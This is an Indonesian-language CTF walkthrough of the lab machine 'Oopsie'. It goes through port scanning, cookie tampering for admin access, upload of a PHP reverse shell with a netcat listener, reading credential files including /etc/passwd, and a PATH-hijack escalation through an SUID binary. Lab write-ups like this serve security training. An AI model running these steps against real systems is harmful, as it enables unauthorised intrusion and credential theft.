Oopsie

#linux #PHP #SUID

nmap -sV -sC <IP_TARGET>

Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-13 22:02 WIB
Nmap scan report for 10.129.60.152
Host is up (0.25s latency).
Not shown: 993 closed tcp ports (conn-refused)
PORT     STATE    SERVICE VERSION
22/tcp   open     ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 61:e4:3f:d4:1e:e2:b2:f1:0d:3c:ed:36:28:36:67:c7 (RSA)
|   256 24:1d:a4:17:d4:e3:2a:9c:90:5c:30:58:8f:60:77:8d (ECDSA)
|_  256 78:03:0e:b4:a1:af:e5:c2:f9:8d:29:05:3e:29:c9:f2 (ED25519)
26/tcp   filtered rsftp
80/tcp   open     http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Welcome
|_http-server-header: Apache/2.4.29 (Ubuntu)
646/tcp  filtered ldp
3737/tcp filtered xpanel
8180/tcp filtered unknown
8192/tcp filtered sophos
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 55.92 seconds

buka browser

dengan menggunakan OWASP ZAP (atau tools lain), diketahui menu login ada di /cdn-cgi/login

url injection menu action id=1, diketahui nilai value admin

inspect -> storage -> cookies ganti value menjadi admin dan access ID admin 34322

lalu kembali ke menu upload, dan akan mengupload reverse shell

source webshells, dan kali ini akan mengupload file php php-reverse-shell.php

modifikasi $ip dan $port sesuai milik kita, misal port 12345, lalu upload

melihat list folder pada website, (target "upload" folder)

gobuster dir --url http://{TARGET_IP}/ --wordlist directory-list-1.0.txt -x php

diketahui terdapat folder /uploads

*biasanya directory-list ada difolder /usr/share/wordlist, atau download google seperti writeup sebelumnya

membuat netcat listener

nc -lvnp 12345

http://{TARGET_IP}/uploads/php-reverse-shell.php

listener sudah mendapat response

mencoba mendapatkan fungsional shell

python3 -c 'import pty;pty.spawn("/bin/bash")'

lalu setelah mencari, dapat memasuki folder /var/www/html/cdn-cgi/login/

cat * | grep -i passw*
cat db.php
cat /etc/passwd

user robert dengan password M3g4C0rpUs3r!

su robert
ls /home/robert/

id

diketahui bahwa robert bagian dari group bugtracker

find / -group bugtracker 2> /dev/null

/usr/bin/bugtracker

echo "/bin/sh" > /tmp/cat
chmod +x /tmp/cat
export PATH=/tmp:$PATH
echo $PATH
bugtracker

done

Wetofu

Oopsie